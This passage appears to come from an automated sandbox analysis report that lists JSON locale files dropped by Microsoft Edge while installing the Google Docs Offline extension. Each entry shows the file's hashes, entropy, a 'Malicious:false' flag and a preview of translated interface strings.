                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):939
